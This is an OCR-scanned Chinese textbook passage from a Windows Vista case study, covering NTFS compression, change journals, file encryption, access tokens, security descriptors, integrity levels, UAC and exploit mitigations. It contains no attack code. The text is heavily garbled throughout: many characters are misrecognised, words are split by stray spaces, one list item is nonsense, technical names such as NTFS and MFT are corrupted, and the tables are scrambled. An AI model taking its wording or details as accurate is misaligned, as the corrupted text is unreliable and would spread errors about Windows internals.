重 解 析 点 也 用 来 为 文件 系统 过 滤器 驱动 程序 而 标记 个 别 文 件 。 在 
图 11-22 中 显示 了 文件 系统 过 滤器 如 何 安 装 到 LO 管理 侨 和 文件 系统 
间 。IO 请 求 通过 调用 IoCompleteRequest 来 完成 ， 其 把 控制 权 转 交 给 在 
请 求 发 起 时 设备 栈 上 每 个 驱动 程序 插入 到 IRP 中 的 完成 例 程 。 需 要 标记 
一 个 文件 的 驱动 程序 首先 关联 一 个 重 解析 标签 ， 然 后 监控 由 于 过 到 重 
解析 点 而 失败 的 打开 文件 操作 的 完成 请 求 。 通 过 用 IRP 传 回 的 数据 块 ， 
驱动 程序 可 以 判断 出 这 是 否 是 一 个 驱动 程序 自身 关联 到 该 文件 的 数据 
块 。 如 果 是 ， 驱 动 程序 将 停止 处 理 完成 例 程 而 接着 处 理 原 来 的 VO 请 
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重 解析 点 并 同时 打开 文件 。 


3. 文 件 压缩 


NTFS 文 持 透 明 的 文件 压缩 。 一 个 文件 能 够 以 压缩 方式 创建 ， 这 意 
味 着 当 向 磁 副 中 写 入 数据 块 时 NTFS 会 自动 党 试 去 压缩 这 些 数据 块 ， 
这 些 数 据 块 被 读 取 时 NTFS 会 日 动 解 压 。 读 或 写 的 进程 完全 不 知道 压缩 
和 解压 在 进行 。 


压缩 流程 是 这 样 的 : 当 NTFS 写 一 个 有 上 压缩 标志 的 文件 到 磁盘 时 ， 

它 检 查 这 个 文件 的 前 16 个 逻辑 块 ， 而 不 管 它们 占用 多 少 个 项 ， 然 后 对 
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中 。 之 后 ， 去 检查 第 16-31 块 看 是 否 能 压缩 到 15 个 甚至 更 少 的 块 ， 以 此 
类 推 。 


& 


图 11-46a 显 示 一 个 文件 。 该 文件 的 前 16 块 被 成 功 地 压缩 到 了 8 个 ， 
对 第 二 个 16 块 的 压缩 没有 成 功 ， 第 三 个 16 块 也 压缩 了 50%。 这 三 个 部 分 
作为 三 个 行 串 来 写 ， 并 存储 于 MFT 记 录 中 。“ 丢 失 ” 的 块 用 磁盘 地 址 0 存 
放 在 MEFT 表 项 中 ， 如 图 11-46b 所 示 。 在 图 中 ， 头 (0, 48) 后 面 有 五 个 


二 元 组 ， 其 中 ， 两 个 对 应 着 第 一 个 (被 压缩 ) 行 串 ， 一 个 对 应 没有 压 
缩 的 行囊 ， 两 个 对 应 最 后 一 个 (被 压缩 ) TTR o 


压缩 前 的 文件 


未 使 用 


i 
ois 


图 11-46 al 一 个 占 48 块 的 文件 被 压缩 到 32 块 的 例子 ，D) 被 压缩 后 文 
件 对 应 的 MFT 记 录 


当 读 文件 时 ，NTFS 需 要 分 辨 某 个 行 串 是 否 被 压缩 过 ， 它 可 以 根据 
磁盘 地 址 进行 分 辨 ， 如 果 其 磁盘 地 址 是 0， 表 明 它 是 16 个 被 压缩 的 块 的 
最 后 部 分 。 为 了 避免 混淆 ， 磁 盘 第 0 块 不 用 于 存储 数据 。 同 时 ， 因 为 卷 
上 的 第 0 块 包含 了 引导 扇 区 ， 用 它 来 存储 数据 也 是 不 可 能 的 。 


随机 访问 压缩 文件 也 是 可 行 的 ， 但 是 需要 技巧 。 假 设 一 个 进程 寻 
找 独 11-46 中 文件 的 第 35 块 ，NTEFS 下 如 何 定 位 一 个 压缩 文件 的 第 35 块 区 
的 呢 ? 答案 是 NTFS 必 须 首 匈 读 取 并 且 解 压 整 个 行 串 ， 获 得 第 35 块 的 位 
置 ， 之 后 就 可 以 将 该 块 传 给 读 取 它 的 进程 。 选 择 16 个 块 作 为 压缩 单元 
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NTEFS 文 持 两 种 让 程序 探测 卷 上 文件 和 目录 变化 的 机 制 。 第 一 种 机 
制 是 调用 名 为 NtNotifyChange Directory File 的 IO 操作 ， 传 递 一 个 缓冲 区 
给 系统 ， 当 系统 探测 到 目录 或 者 子 目录 树 变 化 时 ， 该 操作 返回 。 这 个 
I1/O 操 作 的 结果 是 在 缓冲 区 里 填 上 变化 记录 的 一 个 列表 。 缓 冲 区 应 该 足 
够 大 ， 否 则 填 不 下 的 记录 会 被 丢弃 。 


第 二 种 机 制 是 NTFS 变 化 日 志 。NTFS 将 卷 上 的 目录 和 文件 的 变化 
记录 保存 到 一 个 特殊 文件 中 ， 程 序 可 以 使 用 特殊 文件 系统 控制 操作 来 
读 取 ， 即 调用 API NtFsControlFile 并 以 FSCTL_QUERY_USN_JOURNAL 
为 参数 。 日 志文 件 通 常 很 大 ， 而 且 日 志 中 的 项 在 被 检查 之 前 重用 的 可 
能 性 非常 小 。 


5. 文 件 加 密 


如 今 ， 计 算 机 用 来 存储 很 多 敏感 数据 ， 包 括 公司 收购 计划 、 税 务 
言 妨 、 情 书 ， 数 据 的 所 有 者 不 想 把 这 些 信 息 炊 露 给 任何 人 。 但 十 信息 
的 泄漏 是 有 可 能 发 生 的 ， 例 如 笔记 本 电脑 的 丢失 或 失 鳃 ， 使 用 MS-DOS 
软盘 重 起 桌面 系统 来 绕 过 Windows 的 安全 保护 ;或 者 将 硬盘 从 计算 机 里 
移 到 男 一 台 安 装 了 不 安全 操作 系统 的 计算 机 中 。 


Windows 提 供 了 加 密 文 件 的 选项 来 解决 这 些 问题 ， 因 此 当 电脑 的 失 
寅 或 用 MS-DOS 重 局 时 ， 文 件 内 容 是 不 可 读 的 。Windows 加 密 的 通常 方 
式 是 将 重要 目录 标识 为 加 密 的 ， 然 后 目录 里 的 所 有 文件 都 会 被 加 密 ， 
新 创建 或 移动 到 这 些 目 录 来 的 文件 也 会 被 加 密 。 加 密 和 解密 不 是 NTFS 
自己 管理 的 ， 而 是 由 EFS (Encryption File System) 驱动 程序 来 管理 ， 
EFS 作 为 回调 向 NTFS 注 册 。 


EFS 为 特殊 文件 和 目录 提供 加 密 。 在 Windows Vista 中 还 有 另外 一 个 
叫做 BitLocker 的 加 密 工 具 ， 它 加 密 了 卷 上 几乎 所 有 的 数据 。 只 要 用 户 
使 用 强 密 钥 来 发 挥 这 种 机 制 的 优势 ， 任 何 情况 下 它 都 能 帮助 用 户 保护 
数据 。 考 虑 到 系统 丢失 或 失窃 的 数量 ， 以 及 身份 泄露 的 强烈 敏感 性 ， 
确保 机 密 被 保护 是 非常 重要 的 。 每 天 都 有 惊人 数量 的 笔记 本 电脑 丢 
R; 仅 考 虑 纽约 市 ， 华 尔 街 大 部 分 公司 平均 一 周 在 出 租车 上 丢失 一 人 台 
笔记 本 电脑 。 


ares 


11.9 Windows Vista 中 的 安全 


看 过 加 密 后 ， 该 从 总 体 上 探讨 安全 问题 了 。NTI 的 最 初 设计 符合 美 
国 国防 部 C2 级 安全 需求 (DoD 5200.28-STD) ， 该 橘 皮 书 是 安全 的 DoD 
系统 必需 满足 的 标准 。 此 标准 要 求 操 作 系统 必需 具备 某 些 特性 才能 认 
定 对 特定 类 型 的 军事 工作 是 足够 安全 的 。 虽 然 windows Vista 并 不 是 专 
为 满足 C2 兼 容 性 而 设计 的 ， 但 它 从 最 初 的 NT 安全 设计 中 继承 了 很 多 安 
全 特性 ， 包 括 下 面 的 几 个 : 


DAB GTS HN EK 。 

2) 目 主 访问 控制 。 

3) 特 权 化 访问 榨 制 。 

4) 对 每 个 进程 的 地 址 空间 保护 。 
5) 新 页 被 映射 前 必需 清空 。 

6) 安 全 审计 。 

让 我 们 来 简要 地 回顾 一 下 这 些 条 目 。 


安全 登录 意味 着 系统 管理 员 可 以 要 求 所 有 用 户 必需 拥有 密码 才 可 
以 登录 。 欺 骗 古 指 一 个 恶意 用 户 编写 了 一 个 在 屏幕 上 显示 登录 提示 的 
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用 户 名 和 密码 被 写 到 磁盘 中 并 且 用 户 被 告知 登陆 失败 。Windows Vista 
通过 指示 用 户 按 下 CTRL-ALT-DEL 登 录 来 避免 这 样 的 攻击 。 刍 盘 驱 动 
总 是 可 以 捕获 这 个 键 序列 ， 并 随后 调用 一 个 系统 程序 来 显示 真正 的 登 
录 屏 幕 。 这 个 过 程 可 以 起 作用 是 因为 用 户 进 程 元 法 禁止 键盘 驱动 对 
CTRL-ALT-DEL 的 处 理 。 但 是 NT 可 以 并 且 确 实在 某 些 情况 下 禁用 了 
CTRL-ALTDEL 安 全 警告 序列 。 这 种 想法 来 自 于 Windows XP 和 
Windows 2000， 用 来 使 NT 系统 对 从 Windows 98 切 换 过 来 的 用 户 保持 更 
多 的 兼容 性 。 


目 主 访问 控制 允许 文件 或 者 其 他 对 象 的 所 有 者 指定 谁 能 以 何 种 方 
式 使 用 它 。 特 权 化 访问 控制 允许 系统 管理 员 (超级 用 户 ) 随 需 履 盖 上 
述 权 限 设 定 。 地 址 空间 保护 仅仅 意味 着 每 个 进程 目 己 的 受 保护 的 虚拟 
地 址 空间 不 能 被 其 他 未 授权 的 进程 访问 。 下 一 个 条 目 意 味 着 当 进程 的 
扒 增 长 时 家 映射 进来 的 页 面 被 初始 化 为 零 ， 这 样 它 融 找 不 到 页 面 以 前 
的 所 有 者 所 存放 的 旧 信息 (参见 在 图 11-36 中 为 此 目的 而 提供 的 清 零 页 
的 列表 ) 。 最 后 ， 安 全 审计 使 得 管理 员 可 以 获取 某 些 安全 相关 事件 的 


日 志 。 


权 皮 书 没有 指定 当 笔记 本 电脑 被 瓷 时 将 发 生 什么 事情 ， 然 而 在 一 
个 大 型 组 织 中 每 星期 发 生 一 起 盗窃 是 很 稼 见 的 。 于 是 ，Windows Vista 
提供 了 一 些 工 具 ， 当 笔记 本 人 被 次 或 者 丢失 时 ， 齐 愤 的 用 户 可 以 利用 它 
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下 一 章 将 描述 在 Windows Vista 中 基本 的 安全 概念 ， 以 及 关于 安全 
的 系统 调用 。 最 后 ， 我 们 将 看 看 安全 是 怎样 实现 的 。 


11.9.1 基本 概念 


每 个 Windows Vista 用 户 (和 组 ) 用 一 个 SID (Security ID ， 安 全 
ID) 来 标识 。SID 是 二 进 制 数字 ， 由 一 个 短 的 头 部 后 面 接 一 个 长 的 随机 
部 分 构成 。 每 个 SID 都 是 世界 范围 内 唯一 的 。 当 用 户 启 动 进程 时 ， 进 程 
和 它 的 线程 带 有 该 用 户 的 SID 运 行 。 安 全 系统 中 的 大 部 分 地 方 被 设计 为 
确保 只 有 带 有 授权 SID 的 线程 才 可 以 访问 对 象 。 


每 个 进程 拥有 一 个 指定 了 SID 和 其 他 属性 的 访问 令 牌 。 该 令 牌 通常 
由 winlogon 创 建 ， 就 像 后 面 说 的 那样 。 图 11-47 展 示 了 令 有 牌 的 格式 。 进 
程 可 以 调用 GetTokenInformation 来 获取 令 牌 信息 。 令 牌 的 头 部 包含 了 一 
些 管理 性 的 信息 。 过 期 时 间 字 段 表示 令 牌 何 时 不 再 有 效 ， 但 当前 并 没 
有 使 用 该 字段 。 组 字段 指定 了 进程 所 隶属 的 组 。POSIX 子 系统 需要 该 
字段 。 默 认 的 DACL (Discretionary Access Control List， 自 主 访问 控制 
列表 ) 会 赋 给 被 进程 创建 的 对 象 ， 如 果 没 有 指定 其 他 ACL 的 话 。 用 户 
的 SID 表 示 进 程 的 拥有 者 。 受 限 SID 使 得 不 可 信 的 进程 以 较 少 的 权限 参 
与 到 可 信 进 程 的 工作 中 ， 以 免 造 成 破坏 。 


图 11-47 访问 令 牌 结构 


最 后 ， 权 限 字 段 ， 如 果 有 的 话 ， 赋 予 进程 除 普通 用 户外 特殊 的 权 
利 ， 比 如 关机 和 访问 本 来 无 权 访问 的 文件 的 权利 。 实 际 上 ， 权 限 域 将 
超级 用 户 的 权限 分 成 几 种 可 独立 赋予 进程 的 权限 。 这 样 ， 用 户 可 被 赋 
予 一 些 超级 用 户 的 权限 ， 但 不 是 全 部 的 权限 。 总 之 ， 访 问 令 牌 表示 了 
谁 拥有 这 个 进程 和 与 其 关联 的 权限 及 委 认 值 。 


当 用 户 登 录 时 ，winlogon 赋 予 初始 的 进程 一 个 访问 令 牌 。 后 续 的 进 
程 一 般 会 将 这 个 令 牌 继 承 下 去 。 初 始 时 ， 进 程 的 访问 令 牌 会 被 赋予 其 
所 有 的 线程 。 然 而 ， 线 程 在 运行 过 程 中 可 以 获得 一 个 不 同 的 令 牌 ， 在 
这 种 情况 下 ， 线 程 的 访问 令 牌 覆 盖 了 进程 的 访问 令 牌 。 特 别 地 ， 一 个 
客户 端 线程 可 以 将 访问 权限 传递 给 服务 器 线程 ， 从 而 使 得 服务 器 可 以 
访问 客户 端的 受 保护 的 文件 和 其 他 对 象 。 这 种 机 制 叫做 身份 模拟 
(impersonation) 。 它 是 由 传输 层 (比如 ALPC、 命 名 管道 和 TCP/IP) 
实现 的 、 被 RPC 用 来 实现 从 客户 端 到 服务 器 的 通信 。 传 输 层 使 用 内 核 
中 安全 引用 监控 器 组 件 的 内 部 接口 提取 出 当前 线程 访问 令 牌 的 安全 上 
下 文 ， 并 把 它 传送 到 服务 器 端 来 构建 用 于 服务 器 模拟 客户 身份 的 令 
牌 。 


男 一 个 基本 的 概念 是 安全 描述 符 (security descriptor) 。 每 个 对 象 


都 关联 着 一 个 安全 描述 符 ， 该 描述 符 描 述 了 谁 可 以 对 对 象 执行 何 种 操 


作 。 安 全 描述 符 在 对 象 被 创建 的 时 候 指定 。NTFS 文 件 系统 和 注册 表 维 
护 着 安全 描述 符 的 持久 化 形式 ， 用 以 为 文件 和 键 对 象 对象 管理 器 中 
表示 已 打开 的 文件 和 键 的 实例 ) 创建 安全 描述 符 。 


安全 描述 由 一 个 头 部 和 其 后 带 有 一 个 或 多 个 访问 控制 入 口 (Access 
Control Entry, ACE) 的 DACL 组 成 。ACE 主 要 有 两 类 : 人 允许 项 和 拒绝 
项 。 人 允许 项 含有 一 个 SID 和 一 个 表示 带 有 此 SID 的 进程 可 以 执行 哪些 操 
作 的 位 图 。 拒 绝 项 与 允许 项 相同 ， 不 过 其 位 图 表示 的 是 谁 不 可 以 执行 
那些 操作 。 比 如 ，Idqa 拥 有 一 个 文件 ， 其 安全 描述 符 指定 任何 人 都 可 
读 ，Elvis 不 可 访问 ，Cathy 可 读 可 写 ， 并 且 Ida 目 己 拥有 完全 的 访问 权 
限 。 图 11-48 描 述 了 这 个 简单 的 例子 。Everyone 这 个 SID 表 示 所 有 的 用 
户 ， 但 该 表 项 会 被 任何 显 式 的 ACE 履 新 。 
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图 11-48 文件 的 安全 描述 符 示 例 


bce 


除 DACL 外 ， 安 全 描述 符 还 包含 一 个 系统 访问 控制 列表 (System 
Access Control List, SACL) 。SACL 跟 DACL 很 相似 ， 不 过 它 表示 的 并 
不 是 谁 可 以 使 用 对 象 ， 而 是 哪些 对 象 访问 操作 会 被 记录 在 系统 范围 内 
的 安全 事件 日 志 中 。 在 图 11-48 中 ，Marilyn 对 文件 执行 的 任何 操作 都 将 
会 被 记录 。SACL 还 包含 完整 度 级 别 字段 ， 我 们 将 稍 后 讨论 它 。 


11.9.2 ”安全 相关 的 API 调 用 


Windows Vista 的 访问 榨 制 机 制 大 都 基于 安全 搞 述 符 。 通 利 情 况 下 
进程 创建 对 象 时 会 将 一 个 安全 描述 符 作 为 参数 提供 给 CreateProcess、 
CreateFile 或 者 其 他 对 象 创建 调用 。 该 安全 描述 符 就 会 附属 在 这 个 对 象 
上 ， 就 如 在 图 11-48 中 看 到 的 那样 。 如 果 没有 给 创建 对 象 的 函数 调用 提 
供 安全 描述 符 ， 调 用 者 的 访问 令 牌 中 默认 的 安全 设置 (参见 图 11-47) 
将 被 使 用 。 


大 部 分 win32 API 安 全 调用 跟 安 全 描述 符 的 管理 相关 ， 因 此 在 这 里 
主要 关注 它们 。 图 11-49 列 出 了 那些 最 重要 的 调用 。 为 了 创建 安全 描述 
符 ， 首 先 要 分 配 存储 空间 ， 然 后 调用 Initialize Security Descriptor 初 始 化 
它 。 该 调用 填充 了 安全 描述 符 的 头 部 。 如 果 不 知 道 所 有 者 的 SID ， 可 以 
根据 名 字 用 LookupAccountSid 来 查询 。 随 后 SID 被 插入 到 安全 描述 符 
中 。 对 组 SID 也 一 样 ， 如 果 有 的 话 。 通 常 ， 这 些 SID 会 是 调用 者 目 己 的 
SID 和 它 的 某 一 个 组 SID ， 不 过 系统 管理 员 可 以 填充 任何 SID 。 


Win32 API 函数 i A 
InitializeSecurityDescriptor 准备 一 个 新 的 安全 描述 符 
LookupAccountSid 查询 指定 用 户 名 的 SID 


SetSecurityDescriptorOwner | 设置 安全 描述 符 中 的 所 有 者 的 SID 


设置 安全 描述 符 中 的 组 SID 
初始 化 DACL 或 者 SACL 

向 DACL 或 者 SACL 添 加 一 个 允许 访问 的 新 ACE 
向 DACL 或 者 SACL 添 加 一 个 拒绝 访问 的 新 ACE 
从 DACL 或 者 SACL 删 除 ACE 
使 DACL 依 附 到 一 个 安全 描述 符 


SetSecurityDescriptorGroup 
InitializeAcl 


AddAccessAllowedAce 
AddAccessDeniedAce 
DeleteAce 
SetSecurityDescriptorDacl 


图 11-49 Win32 中 基本 的 安全 调用 


这 时 可 调用 InitializeAcl 初 始 化 安全 描述 符 的 DACL (或 者 
SACL) 。ACL 入 口 项 可 通过 AddAccess AllowedAce 和 
AddAccessDeniedAce。 可 多 次 调用 这 些 函 数 以 添加 任何 所 需 的 ACE 入 
口 项 。 可 调用 DeleteAce 来 删除 一 个 入 口 项 ， 这 用 来 修改 已 存在 的 ACL 
而 不 是 构建 一 个 新 的 ACL 。SetSecurity DescriptorDacl 可 以 把 一 个 准备 
就 绪 的 ACL 与 安全 描述 符 关 联 到 一 起 。 最 后 ， 当 创建 对 象 时 ， 可 将 新 
构造 的 安全 描述 符 作 为 参数 传送 使 其 与 这 个 对 象 相关 联 。 


11.9.3 ”安全 性 的 实现 


在 独立 的 Windows Vista 系 统 中 ， 安 全 由 大 量 的 组 件 来 实现 ， 我 们 
已 经 看 过 了 其 中 大 部 分 组 件 〈 网 络 是 完全 不 同 的 事情 ， 超 出 了 本 书 的 
讨论 范围 ) 。 登 录 和 认证 分 别 由 winlogon 和 1lsass 来 处 理 。 登 录 成 功 后 
会 获得 一 个 带 有 访问 令 牌 的 GUI shell 程 序 (explorer.exe) 。 这 个 进程 
使 用 注册 表 中 的 SECURITY 和 SAM 表 项 。 前 者 设置 一 般 性 的 安全 策 
略 ， 而 后 者 包含 了 针对 个 别 用 户 的 安全 信息 ， 如 11.2.3 节 讨论 的 那样 。 


一 旦 用 户 登 录 成 功 ， 每 当 打 开 对 象 进行 访问 束 会 触发 安全 操作 。 
每 次 OpenXXX 调 用 都 需 提 供 正 要 被 打开 的 对 象 的 名 字 和 所 需 的 权限 集 
合 。 在 打开 的 过 程 中 ， 安 全 引用 监控 器 会 检查 调用 者 是 否 拥 有 所 需 的 
权限 。 它 通过 检查 调用 者 的 访问 令 牌 和 跟 对 象 关 联 的 DACL 来 执行 这 
种 检查 。 安 全 监控 管理 器 依次 检查 ACL 中 的 每 个 ACE。 一 旦 发 现 入 口 
项 与 调用 者 的 SID 或 者 调用 者 所 隶属 的 某 个 组 相 匹 配 ， 访 问 权 限 即 可 
确定 。 如 果 调 用 者 拥有 所 和 需 的 权限 ， 则 打开 成 功 ， 否 则 打开 失败 。 


正如 已 经 看 到 的 那样 ， 除 允许 项 外 ，DACL 还 包括 拒绝 项 。 
此 ， 通 第 把 ACL 中 的 拒绝 访问 的 项 置 于 赋予 访问 权限 的 项 之 面 ， 这 样 
一 个 被 特意 拒绝 访问 的 用 户 不 能 通过 作为 拥有 合法 访问 权限 的 组 的 成 
员 这 样 的 后 门 获得 访问 权 。 


对 象 被 打开 后 ， 调 用 者 会 获得 一 个 句柄 。 在 后 续 的 调用 中 ， 只 需 
今 碍 笑 试 的 操作 是 否 在 打开 时 所 申请 的 操作 集合 内 ， 这 样 束 避免 了 调 
用 者 为 了 读 而 打开 文件 然后 对 该 文件 进行 写 操作 。 男 外 ， 正 如 SACL 
所 要 求 的 那样 ， 在 句柄 上 进行 的 调用 可 能 会 导致 产生 审计 日 志 。 


Windows Vista 增 加 了 另外 的 安全 设施 来 应 对 使 用 ACL 保 护 系统 的 
共同 问题 。 进 程 的 令 牌 中 含有 新 增加 的 必需 的 完整 性 级 别 (Integrity- 
Level) SID 字 段 并 且 对 象 在 SACL 中 指定 了 一 个 完整 性 级 别 ACE。 完 整 
性 级 别 阻止 了 对 对 象 的 写 访问 ， 不 管 DACL 中 有 何 种 ACE。 特 别 地 ， 
完整 性 级 别 方案 用 来 保护 系统 免 受 被 攻击 者 控制 的 Internet Explorer 进 
程 〈 可 能 用 户 接受 了 不 妥 的 建议 而 从 未 知 的 网 站 下 载 代码 ) 的 破坏 。 
低 权限 的 了 正 ， 运 行 时 的 完整 性 级 别 被 设置 为 低 。 系 统 中 所 有 的 文件 和 
注册 表 中 的 键 拥有 中 级 的 完整 性 级 别 ， 因 此 低 完 整 性 级 别 的 正 不 能 修 
改 它 们 。 


近年 来 Windows 增 加 了 很 多 其 他 的 安全 特性 。 对 于 Windows XP 
Service Pack 2 来 说 ， 系 统 的 大 部 分 在 编译 时 使 用 了 可 对 多 种 栈 缓冲 区 
溢出 漏洞 进行 验证 的 选项 GS) 。 男 外 ， 在 AMD64 体 系 结构 中 一 种 
叫做 NX 的 设施 可 限制 执行 栈 上 的 代码 。 即 使 在 x86 模 式 下 处 理 右 中 的 
NX 位 也 是 可 用 的 。NX 代 表 不 可 执行 (no execute) ， 它 可 以 给 页 面 加 
上 标记 使 得 其 上 的 代码 不 能 被 执行 。 这 样 ， 即 使 攻击 者 利用 缓冲 区 淆 


出 漏洞 向 进程 插入 代码 ， 跳 转 到 代码 处 开始 执行 也 不 是 一 件 容易 的 事 


情 。 


Windows Vista 引 入 了 更 多 的 安全 特性 来 阻止 攻击 者 。 加 载 到 内 核 
态 的 代码 要 经 过 检查 (这 在 x64 系 统 中 是 默认 的 ) 并 且 只 有 被 正确 签名 
的 代码 才 可 以 被 加 载 。 在 每 个 系统 中 ，DLL 和 EXE 的 加 载 地 址 连同 栈 
分 配 的 地 址 都 经 过 了 有 和 意 的 混 排 ， 这 使 得 攻击 者 不 太 可 能 利用 缓冲 区 
溢出 漏洞 跳 转 到 一 个 众所周知 的 地 址 然后 执行 一 段 被 特意 编排 的 可 获 
得 权限 提升 的 代码 。 会 有 更 小 比例 的 系统 受到 依赖 于 标准 地 址 处 的 二 
进 制 数据 的 攻击 。 在 受到 攻击 时 系统 更 加 可 能 只 是 天 省 掉 ， 将 一 个 潜 
在 的 权限 升级 攻击 转化 为 危险 性 更 小 的 拒绝 服务 攻击 。 


在 微软 公司 称 为 用 户 账 户 控制 (User Account Control, UAC) 的 
引入 是 另 一 个 改变 。 这 用 来 解决 大 部 分 用 户 以 管理 员 吴 份 运行 系统 这 
个 长 期 的 问题 。Windows 的 设计 并 不 需要 用 户 以 管理 员 喘 份 使 用 系 
统 ， 但 在 很 多 发 布 版 本 中 对 此 问题 的 忽视 使 得 如 采 你 不 是 管理 员 束 不 
可 能 顺利 地 使 用 Windows。 始终 以 管理 员 喘 份 使 用 系统 是 危险 的 。 用 
尸 的 错误 会 轻易 地 虹 坏 系统 ， 而 且 如 采用 户 由 于 某 种 原因 被 欺骗 或 攻 
击 了 而 去 运行 可 能 危害 系统 的 代码 ， 这 些 代码 将 拥有 管理 员 的 访问 权 
限 并 且 可 能 会 把 其 目 映 深 深 埋藏 在 系统 


如 采 有 UAC， 当 壬 试 执行 需要 管理 员 访 问 权 限 的 操作 时 ， 系 统 会 
显示 一 个 重合 的 特殊 朱 面 并 且 接 管控 制 权 ， 使 得 只 有 用 户 的 输入 可 以 


授权 这 次 访问 (与 C2 安全 中 CTRL-ALT-DEL 的 工作 方式 类 似 ) 。 当 
然 ， 攻 击 者 不 需要 成 为 管理 员 也 可 以 破坏 用 户 所 真正 关心 的 ， 比 如 他 
的 个 人 文件 。 但 UAC 确 实 可 阻止 现 有 类 型 的 攻击 ， 并 且 如 果 攻 击 者 不 
能 修改 任何 系统 数据 或 文件 ， 那 受 损 的 系统 恢复 起 来 也 比 容易 。 


Windows Vista 中 最 后 的 一 个 安全 特性 已 经 提 到 过 了 。 这 束 古 对 具 
有 安全 边界 的 受 保护 进程 (protected process) 的 支持 。 通 常 ， 在 系统 
中 用 户 (由 令 牌 对 象 代 表 ) 定义 了 权限 的 边界 。 创 建 进程 后 ， 用 户 可 
通过 任意 数目 的 内 核 设施 来 访问 进程 以 进行 进程 创建 、 调 试 、 获 取 路 
径 名 和 线程 注入 等 。 受 保护 进程 关 掉 了 用 户 的 访问 权限 。 这 个 设施 在 
Vista 中 的 唯一 用 处 惑 是 允许 数字 版 权 管 理 软件 更 好 地 保护 内 容 。 对 受 
保护 进程 的 使 用 在 未 来 的 发 布 版 本 中 可 能 会 用 于 对 用 户 更 加 友好 的 目 
的 ， 比 方 说 保护 系统 以 应 对 攻击 者 而 不 是 保护 内 容 免 受 系统 所 有 者 的 
攻击 。 


由 于 世界 范围 内 越 来 越 多 的 针对 Windows 系 统 的 攻击 ， 近 年 来 微 
软 公 司 加 大 了 提高 Windows 安 全 性 的 努力 。 其 中 某 些 攻击 非常 成 功 ， 
使 得 整个 国家 和 主要 公司 的 计算 机 都 宕 控 了 ， 导 致 了 数 十 亿美 元 的 损 
失 。 这 些 攻击 大 都 利用 了 编码 中 的 小 错误 ， 这 些 错误 可 导致 缓冲 区 盗 
出 ， 从 而 使 得 攻击 者 可 以 通过 重 写 返 回 地 址 、 腊 各 处 理 指针 和 其 他 数 
据 来 控制 程序 的 执行 。 使 用 类 型 安全 的 语言 而 不 是 C 和 C++ 可 避免 许多 
此 类 的 问题 。 即 使 使 用 这 些 不 安全 的 语言 ， 如 果 让 学 生 更 好 地 理解 参 


数 和 数据 验证 中 的 陷阱 ， 许 多 漏洞 也 可 以 避免 。 上 毕竟， 许多 在 
Microsoft 编 写 代 码 的 软件 工程 师 在 几 年 前 也 还 是 学 生 ， 就 像 正在 阅读 
此 实例 研究 的 你 们 中 的 许多 人 一 样 。 有 许多 关于 在 基于 指针 的 语言 
可 被 利用 的 编码 上 的 小 错误 的 类 型 以 及 怎样 避免 的 书籍 (比如 ， 
Howard 和 LeBlank，2007) 。 
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Windows Vista 中 的 内 核 态 由 HAL、NTOS 的 内 核 和 执行 体 层 以 及 
大 量 实现 了 从 设备 服务 到 文件 系统 、 从 网 络 到 图 形 的 设备 驱动 程序 组 
成 。 HAL 对 其 他 组 件 隐 藏 了 硬件 上 的 某 些 差 别 。 内 核 层 管理 CPU 以 支 
持 多 线程 和 同步 ， 执 行 体 实现 大 多 数 的 内 核 态 服 务 。 


执行 体 基于 内 核 态 的 对 象 ， 这 些 对 象 代表 了 关键 的 执行 体 数据 结 
构 ， 包 括 进 程 、 线 程 、 内 存 区 、 驱 动 程序 、 设 备 以 及 同步 对 象 等 。 用 
户 进程 通过 调用 系统 服务 来 创建 对 象 并 获得 句柄 的 引用 以 用 于 后 续 对 
执行 体 组 件 的 调用 。 操 作 系统 也 创建 一 些 内 部 对 象 。 对 和 象 管理 硕 维 护 
者 一 个 名 字 空 间 ， 对 象 可 以 插入 该 名 字 空 间 以 备 后 续 的 查询 。 


Windows 系 统 中 最 重要 的 对 象 是 进程 、 线 程 和 内 存 区 。 进 程 拥有 
虚拟 地 址 空间 并 且 是 资源 的 容器 。 线 程 是 执行 的 单元 并 被 内 核 层 使 用 
优先 级 算法 调度 执行 ， 该 优先 级 算法 使 优先 级 最 高 的 束 绪 线程 总 在 运 
行 ， 并 且 如 有 必要 可 抢占 低 优先 级 线程 。 内 存 区 表示 可 以 映射 到 进程 
地 址 空间 的 像 文件 这 样 的 内 存 对 象 。EXE 和 DLL 等 程序 映像 用 内 存 区 
来 表示 ， 就 像 共 至 内 存 一 样 。 


Windows 支 持 按 需 分 页 虚拟 内 存 。 分 页 算法 基于 工作 集 的 概念 。 
系统 维护 着 几 种 类 型 的 页 面 列表 来 优化 内 存 的 使 用 。 这 些 页 面 列表 是 


通过 调整 工作 集 来 填充 的 ， 调 整 过 程 使 用 了 复杂 的 规则 试图 重用 在 长 
时 间 内 没有 被 引用 的 物理 页 面 。 绥 存 管理 右 管 理 内 核 中 的 虚拟 地 址 并 
用 它 将 文件 映射 到 内 存 ， 这 提高 了 许多 应 用 程序 的 MO 性 能 ， 因 为 读 操 
作 不 用 访问 磁 表 吏 可 被 满足 。 


设备 驱动 程序 遵循 Windows 张 动 程序 模型 ， 并 执行 输入 /和 输出。 每 
个 弛 动 程序 开始 允 初 始 化 一 个 张 动 程序 对 象 ， 该 对 象 舍 有 可 被 系统 调 
用 以 操控 设备 的 过 程 的 地 址 。 实 际 的 设备 用 设备 对 象 来 代表 ， 设 备 对 
象 可 以 根据 系统 的 配置 描述 来 创建 ， 或 者 由 即 插 即 用 管理 紫 按 照 它 在 
枚 举 系统 总 线 时 所 发 现 的 设备 创建 。 设 备 组 织 成 一 个 栈 ，LIO 请 求 包 沿 
着 栈 同 下 传递 并 被 每 个 设备 的 驱动 程序 处 理 。I/O 具 有 内 在 的 异步 性 ， 
驳 动 程序 程序 通常 将 请 求 排队 以 便 后 续 处 理 然后 返回 到 调用 者 。 文 件 
系统 卷 作为 UO 系统 中 的 设备 实现 。 


NTFS 文 件 系 统 基 于 一 个 主 文件 表 ， 每 个 文件 或 者 目录 在 表 中 有 一 
条 记录 。NTFS 文 件 系 统 的 所 有 元 数据 本 身 是 NTFS 文 件 的 一 部 分 。 每 
个 文件 含有 多 个 属性 ， 这 些 属性 或 存储 在 MFT 记 录 中 或 者 不 在 其 中 
(存储 在 MFT 外 部 的 块 中 ) 。 除 此 之 外 ，NTFS 还 支持 Unicode、 压 


缩 、 日 志和 加 密 等 。 


最 后 ，Windows Vista 拥 有 一 个 基于 访问 控制 列表 和 完整 性 级 别 的 
成 熟 的 安全 系统 。 每 个 进程 囊 有 一 个 令 牌 ， 此 令 牌 表示 了 用 户 的 标识 
